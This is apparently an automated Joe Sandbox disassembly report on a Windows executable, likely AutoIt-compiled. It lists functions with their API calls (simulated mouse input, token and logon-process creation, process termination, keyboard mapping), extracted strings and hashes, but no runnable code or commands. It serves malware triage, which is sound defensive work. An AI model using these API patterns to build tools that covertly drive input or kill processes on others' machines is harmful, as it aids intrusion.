API ID: PaintWindow$BeginClientLongRectScreenViewport
String ID:
API String ID: 1827037458-0
Opcode ID: 296e2543ba029fbaae6c07037a7b0176cef140b96a2a252fd957cb7bc36b0e32
Instruction ID: 8bdfba4a5036790914f9366ae38d9e515789c194dc518f339bf0fcd90b7a01d3
Opcode Fuzzy Hash: 296e2543ba029fbaae6c07037a7b0176cef140b96a2a252fd957cb7bc36b0e32
Instruction Fuzzy Hash: D8418C30504710AFD710DF24CC84FBB7BEAEB4A724F144629FAA58A2E1D731A985DB61

Function 0068B69E Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(006C57B0,00000000,01425550,?,?,006C57B0,?,0068B5A8,?,?), ref: 0068B712
EnableWindow.USER32(00000000,00000000), ref: 0068B736
ShowWindow.USER32(006C57B0,00000000,01425550,?,?,006C57B0,?,0068B5A8,?,?), ref: 0068B796
ShowWindow.USER32(00000000,00000004,?,0068B5A8,?,?), ref: 0068B7A8
EnableWindow.USER32(00000000,00000001), ref: 0068B7CC
SendMessageW.USER32(?,0000130C,?,00000000), ref: 0068B7EF

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 77bb4a715b0ca8b315ae7a883a0b2f78e46918447bdee76da76db23c798009f0
Instruction ID: fed334d13a061fe458c602acf062ab93c91f581250e58c8ad1998304342ffe92
Opcode Fuzzy Hash: 77bb4a715b0ca8b315ae7a883a0b2f78e46918447bdee76da76db23c798009f0
Instruction Fuzzy Hash: 09417D34600240AFDB22EF24D499BD57BE2FF49310F5852B9E9488F7A2C731A856CB50

Function 0067709E Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,00674E41,?,?,00000000,00000001), ref: 006770AC

Part of subcall function 006739A0: GetWindowRect.USER32(?,?), ref: 006739B3

GetDesktopWindow.USER32 ref: 006770D6
GetWindowRect.USER32(00000000), ref: 006770DD
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 0067710F

Part of subcall function 00665244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 006652BC

GetCursorPos.USER32(?), ref: 0067713B
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00677199

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: ae9123ba6f40875248ca21ad6915bec0069000b2570aeed9f2a226365469e19e
Instruction ID: 578509b7289df5794609410a9fbec880110da19dafe5f70b20f7882ad9c4ecbd
Opcode Fuzzy Hash: ae9123ba6f40875248ca21ad6915bec0069000b2570aeed9f2a226365469e19e
Instruction Fuzzy Hash: C731D272609305ABD720DF14D849B9BB7AAFF89314F040A19F58997291DB30EA09CB92

Function 00658879 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 006580A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 006580C0
Part of subcall function 006580A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 006580CA
Part of subcall function 006580A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 006580D9
Part of subcall function 006580A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 006580E0
Part of subcall function 006580A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 006580F6

GetLengthSid.ADVAPI32(?,00000000,0065842F), ref: 006588CA
GetProcessHeap.KERNEL32(00000008,00000000), ref: 006588D6
HeapAlloc.KERNEL32(00000000), ref: 006588DD
CopySid.ADVAPI32(00000000,00000000,?), ref: 006588F6
GetProcessHeap.KERNEL32(00000000,00000000,0065842F), ref: 0065890A
HeapFree.KERNEL32(00000000), ref: 00658911

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: 57d546b196c8f6de59cf614aed26dc92e7e9f877f60bcec46448afa17786b191
Instruction ID: d17c205ebb35fdda639fef3efc41d3dbeaf33fdf7f7752ddc75b88443ba9607f
Opcode Fuzzy Hash: 57d546b196c8f6de59cf614aed26dc92e7e9f877f60bcec46448afa17786b191
Instruction Fuzzy Hash: B211B131501209FFDB109FA8DC09BFEB77AEB44316F104128E885E7210CB32AD18DB60

Function 006585B1 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 006585E2
OpenProcessToken.ADVAPI32(00000000), ref: 006585E9
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 006585F8
CloseHandle.KERNEL32(00000004), ref: 00658603
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00658632
DestroyEnvironmentBlock.USERENV(00000000), ref: 00658646

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 021ad615f3a458e190358c2ae3c50dc7c214d5cb09a03ea44995aed6680dc596
Instruction ID: 0903e614ebc92eb0d721afa694c75fa61026dd2025c18ddc2c8725e8f9df0bca
Opcode Fuzzy Hash: 021ad615f3a458e190358c2ae3c50dc7c214d5cb09a03ea44995aed6680dc596
Instruction Fuzzy Hash: D2115972501209BFDF018FA4ED49FEE7BAAEF48305F144164FE04A2160C7728E65EB60

Function 0065B790 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0065B7B5
GetDeviceCaps.GDI32(00000000,00000058), ref: 0065B7C6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 0065B7CD
ReleaseDC.USER32(00000000,00000000), ref: 0065B7D5
MulDiv.KERNEL32(000009EC,?,00000000), ref: 0065B7EC
MulDiv.KERNEL32(000009EC,?,?), ref: 0065B7FE

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 041dd40cc4511caba3ba6395cb65dd77fedf8f92d69fb57b1a21b73c01d10eb8
Instruction ID: d0dca4e8bca8a6da74b5a042d089ec97adc53789c8d19a64a2c4860df2c92cae
Opcode Fuzzy Hash: 041dd40cc4511caba3ba6395cb65dd77fedf8f92d69fb57b1a21b73c01d10eb8
Instruction Fuzzy Hash: 1D018475E00209BBEF109BA69C49A5EBFB9EB4C311F004175FE04A7291D6319C10CF90

Function 00620162 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00620193
MapVirtualKeyW.USER32(00000010,00000000), ref: 0062019B
MapVirtualKeyW.USER32(000000A0,00000000), ref: 006201A6
MapVirtualKeyW.USER32(000000A1,00000000), ref: 006201B1
MapVirtualKeyW.USER32(00000011,00000000), ref: 006201B9
MapVirtualKeyW.USER32(00000012,00000000), ref: 006201C1

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: c8ce5e51924d6c0b2d98f57fdacc3e3a7c583f7c2996e29096ff11bfe3098502
Instruction ID: 52b73b378a183050eee603c40363860a249c3615448359fcb5683e8554e6589a
Opcode Fuzzy Hash: c8ce5e51924d6c0b2d98f57fdacc3e3a7c583f7c2996e29096ff11bfe3098502
Instruction Fuzzy Hash: 02016CB09417597DE3008F5A8C85B52FFA8FF19354F00421BA15C87941C7F5A864CBE5

Function 006653E9 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 006653F9
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0066540F
GetWindowThreadProcessId.USER32(?,?), ref: 0066541E
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0066542D
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00665437
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0066543E

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: e4ba6bdfb3aaa060c78c58e0fc4e4066b1ed364101e41a26d02267fc2ac9ecd4
Instruction ID: da6c7bb6ec4471889e2634f9d594e165de1e0f2ab0f76849bbd407c8d6ff3c9b
Opcode Fuzzy Hash: e4ba6bdfb3aaa060c78c58e0fc4e4066b1ed364101e41a26d02267fc2ac9ecd4
Instruction Fuzzy Hash: CAF09032240158BBE3205BA2DC0EEEF7B7DEFCAB11F000369FA04D1050EBA01A4187B5

Function 00667230 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 00667243
EnterCriticalSection.KERNEL32(?,?,00610EE4,?,?), ref: 00667254
TerminateThread.KERNEL32(00000000,000001F6,?,00610EE4,?,?), ref: 00667261
WaitForSingleObject.KERNEL32(00000000,000003E8,?,00610EE4,?,?), ref: 0066726E

Part of subcall function 00666C35: CloseHandle.KERNEL32(00000000,?,0066727B,?,00610EE4,?,?), ref: 00666C3F

InterlockedExchange.KERNEL32(?,000001F6), ref: 00667281
LeaveCriticalSection.KERNEL32(?,?,00610EE4,?,?), ref: 00667288

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: a75caf38f1a0dcf7832a177602a4ab4cc9c266c531dbb972171d4ed3a4966c2d
Instruction ID: 8f4f0de8e7816544eab39eaef748d5786e17fc514af6452994a1f1cbd2837594
Opcode Fuzzy Hash: a75caf38f1a0dcf7832a177602a4ab4cc9c266c531dbb972171d4ed3a4966c2d
Instruction Fuzzy Hash: 82F05E36540612FBD7511BA4ED5C9DB773BEF45702F101631F603A10A0DB7A5A11CB50

Function 00658992 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 0065899D
UnloadUserProfile.USERENV(?,?), ref: 006589A9
CloseHandle.KERNEL32(?), ref: 006589B2
CloseHandle.KERNEL32(?), ref: 006589BA
GetProcessHeap.KERNEL32(00000000,?), ref: 006589C3
HeapFree.KERNEL32(00000000), ref: 006589CA

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 0abe057741b9079191b566f56b8278fb96e8349dbc93dfe117031a251d21f99a
Instruction ID: f13235abed3b48c4496d8f75ffa8664514502075af5ca91ac6e19c98650edb84
Opcode Fuzzy Hash: 0abe057741b9079191b566f56b8278fb96e8349dbc93dfe117031a251d21f99a
Instruction Fuzzy Hash: 25E05276104505FBDB011FE5EC0C95ABB7AFB89762B509731F219C1474CB329461DB90

Function 00657530 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 231COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00692C7C,?), ref: 006576EA
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00692C7C,?), ref: 00657702
CLSIDFromProgID.OLE32(?,?,00000000,0068FB80,000000FF,?,00000000,00000800,00000000,?,00692C7C,?), ref: 00657727
_memcmp.LIBCMT ref: 00657748

Strings

,,i, xrefs: 0065753D

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID: ,,i
API String ID: 314563124-3276395716
Opcode ID: d3d3d1fb1df0d621a5b63b272fcc574312426b1e4eba54a199881e52d9377ea2
Instruction ID: d96ec1107fa43700cfbf912436dc6fc441e7dbf8165484a2931aaf626ee614fb
Opcode Fuzzy Hash: d3d3d1fb1df0d621a5b63b272fcc574312426b1e4eba54a199881e52d9377ea2
Instruction Fuzzy Hash: 1981ED75A00109EFCB04DFA4D984DEEB7BAFF89315F204558F505AB250DB71AE4ACB60

Function 006785ED Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00678613
CharUpperBuffW.USER32(?,?), ref: 00678722
VariantClear.OLEAUT32(?), ref: 0067889A

Part of subcall function 00667562: VariantInit.OLEAUT32(00000000), ref: 006675A2
Part of subcall function 00667562: VariantCopy.OLEAUT32(00000000,?), ref: 006675AB
Part of subcall function 00667562: VariantClear.OLEAUT32(00000000), ref: 006675B7

Strings

Incorrect Parameter format, xrefs: 0067864B, 0067880D
AUTOIT.ERROR, xrefs: 00678728

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: d1dccf02338f44ac56c6aad9fe58855906ff8e1645f896b0b39af1a8a27814f9
Instruction ID: a9919fe0623b222af47804d4721b550262ae715e78348eab44741643ffa81cd2
Opcode Fuzzy Hash: d1dccf02338f44ac56c6aad9fe58855906ff8e1645f896b0b39af1a8a27814f9
Instruction Fuzzy Hash: 22917D706443019FCB54DF24C48495BBBE6EF89714F14896EF89A8B3A2DB30ED46CB52

Function 00662A96 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0061FC86: _wcscpy.LIBCMT ref: 0061FCA9

_memset.LIBCMT ref: 00662B87
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00662BB6
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00662C69
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00662C97

Strings

0, xrefs: 00662B73

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: a9a4c1e72b521d39dc9181958c4c9e03293950cdfdace6adb69371e45ddd8be4
Instruction ID: 21a0c46f7c5cd7f03bed06dc7580aff97db2111d6827c5102be73aa76d6c905d
Opcode Fuzzy Hash: a9a4c1e72b521d39dc9181958c4c9e03293950cdfdace6adb69371e45ddd8be4
Instruction Fuzzy Hash: 3251E071208B029FD7A49F28D864AAFB7EAEF94310F040A2DF881D7290DB70CC44CB56

Function 00613137 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 161COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00613277
_memmove.LIBCMT ref: 00613310
_free.LIBCMT ref: 00613336
_memmove.LIBCMT ref: 006133E9

Strings

_a, xrefs: 00613322
3ca, xrefs: 00613225

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: _memmove$_free
String ID: 3ca$_a
API String ID: 2620147621-1000881220
Opcode ID: 6bdd36878b432bdc5f82eab823fe24391bc112bc53abe5cdda837f43cfe3823f
Instruction ID: 99e9459d7a462524bd0ebd2af0e2699b7e21fde9c7d9be9fbf6b272736eb2164
Opcode Fuzzy Hash: 6bdd36878b432bdc5f82eab823fe24391bc112bc53abe5cdda837f43cfe3823f
Instruction Fuzzy Hash: 8A515B716087519FDB65CF28C451BAABBE6EF85310F08482DE98AD7361DB31E941CB42

Function 00616192 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 141COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00616248
_memmove.LIBCMT ref: 006162E4
_memset.LIBCMT ref: 00616308

Strings

ERCP, xrefs: 006161B3
3ca, xrefs: 006162AF

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: _memset$_memmove
String ID: 3ca$ERCP
API String ID: 2532777613-1343919959
Opcode ID: 39ee015463f775cbf45b290100ae3a86901e716c9fbe11be6f7614dd198448c8
Instruction ID: f88791921a5bbc8042c8e9a4697ae0e82480620910dc505b2a38afe65dc58a25
Opcode Fuzzy Hash: 39ee015463f775cbf45b290100ae3a86901e716c9fbe11be6f7614dd198448c8
Instruction Fuzzy Hash: EF51C075A00705DBDB24CFA5C981BEABBF6EF04304F24456EE94ACB241E770EA85CB50

Function 00662753 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006627C0
GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 006627DC
DeleteMenu.USER32(?,00000007,00000000), ref: 00662822
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,006C5890,00000000), ref: 0066286B

Strings

0, xrefs: 006627B5

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: b77d01f6f44e05f4aaec8e4300219bfc9c92d687187b8fe079a5c008358137b7
Instruction ID: 6e9772dcf5d0fb45bee6b46244ee16b192e5368c82dc3c37f214863a30c1e9d7
Opcode Fuzzy Hash: b77d01f6f44e05f4aaec8e4300219bfc9c92d687187b8fe079a5c008358137b7
Instruction Fuzzy Hash: 8F41A070604702AFD724DF28CC94B5ABBEAEF95314F044A2DF865973D1D730A809CB66

Function 0067D7A5 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0067D7C5

Part of subcall function 0060784B: _memmove.LIBCMT ref: 00607899

Strings

none, xrefs: 0067D8A0
winapi, xrefs: 0067D836
stdcall, xrefs: 0067D847
cdecl, xrefs: 0067D81C

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: BuffCharLower_memmove
String ID: cdecl$none$stdcall$winapi
API String ID: 3425801089-567219261
Opcode ID: b9b1f3990157351d711ff1ff10736064fb47e391b9d3dae3160b3181450bff9e
Instruction ID: 8616e3f10acc7813f5d6f388ea7c3323f0c770dc09650932993701321a09d97d
